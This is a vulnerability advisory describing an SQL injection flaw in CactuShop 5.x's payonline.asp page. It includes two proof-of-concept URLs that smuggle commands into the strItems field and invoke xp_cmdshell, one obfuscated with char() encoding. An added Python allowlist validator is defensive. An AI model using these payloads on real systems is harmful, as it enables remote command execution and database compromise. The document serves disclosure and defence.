Cactusoft CactuShop SQL Injection Vulnerability
BID:10019
Info
| Bugtraq ID: | 10019 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 31 2004 12:00AM |
| Updated: | Mar 31 2004 12:00AM |
| Credit: | Discovery of this issue is credited to Nick Gudov <[email protected]>. |
| Vulnerable: | CactuSoft CactuShop 5.1, CactuSoft CactuShop 5.0 |
| Not Vulnerable: | |
Discussion
CactuShop is reportedly prone to a remote SQL injection vulnerability. The issue is due to a failure to properly sanitize user-supplied URI input before using it to build an SQL query.
As a result of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.
Exploit / POC
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/payonline.asp/strAgain=yes&[email protected]&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed
http://www.example.com/payonline.asp/strAgain=yes&[email protected]&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed
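Added example (not CactuShop code and not part of the original advisory): a strict allowlist check for the cart fields in the requests above, usable in front of the application or over logged request lines. It assumes, from the values `214...z165z`, `6z2z` and `numItemCount=2` in those requests, that `strItems` and `strQuantities` are lists of integers each terminated by `z`; the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Assumed format, inferred from the advisory's request: integers each ended by "z".
Z_LIST = re.compile(r"(?:[0-9]{1,9}z)+")

def parse_z_list(raw):
    """Return the integers in a 'z'-terminated list, or None if raw is malformed."""
    if not Z_LIST.fullmatch(raw):
        return None
    return [int(n) for n in raw.split("z")[:-1]]

def query_params(target):
    """Decode parameters from 'page.asp?a=b' or the 'page.asp/a=b' form seen above."""
    _, sep, query = target.partition("?")
    if not sep:
        _, _, query = target.partition(".asp/")
    params = {}
    # Split on '&' only, so a ';' inside a value stays part of that value.
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        params[name] = unquote_plus(value)
    return params

def check_order_request(target):
    """Return a list of findings; an empty list means the cart fields are well formed."""
    p = query_params(target)
    findings = []
    items = parse_z_list(p.get("strItems", ""))
    quantities = parse_z_list(p.get("strQuantities", ""))
    if items is None:
        findings.append("strItems is not a z-terminated integer list")
    if quantities is None:
        findings.append("strQuantities is not a z-terminated integer list")
    count = p.get("numItemCount", "")
    if items is not None and quantities is not None:
        ok = re.fullmatch(r"[0-9]{1,4}", count) is not None
        if not (ok and int(count) == len(items) == len(quantities)):
            findings.append("numItemCount does not match the list lengths")
    return findings

# Constructed sample requests (not captured traffic).
SAMPLES = [
    "/payonline.asp?numItemCount=2&strItems=214z165z&strQuantities=6z2z",
    "/payonline.asp/numItemCount=2&strItems=214;--z165z&strQuantities=6z2z",
    "/payonline.asp?numItemCount=3&strItems=214z165z&strQuantities=6z2z",
]
if __name__ == "__main__":
    for s in SAMPLES:
        print(s, "->", check_order_request(s) or "ok")
```

Validation of this kind narrows what reaches the query; building the query with bound parameters is what removes the injection itself.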
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- CactuShop (CactuSoft)
- CactuSoft CactuShop 5.x shopping cart software multiple security vulnerabilities (S-Quadra Security Research)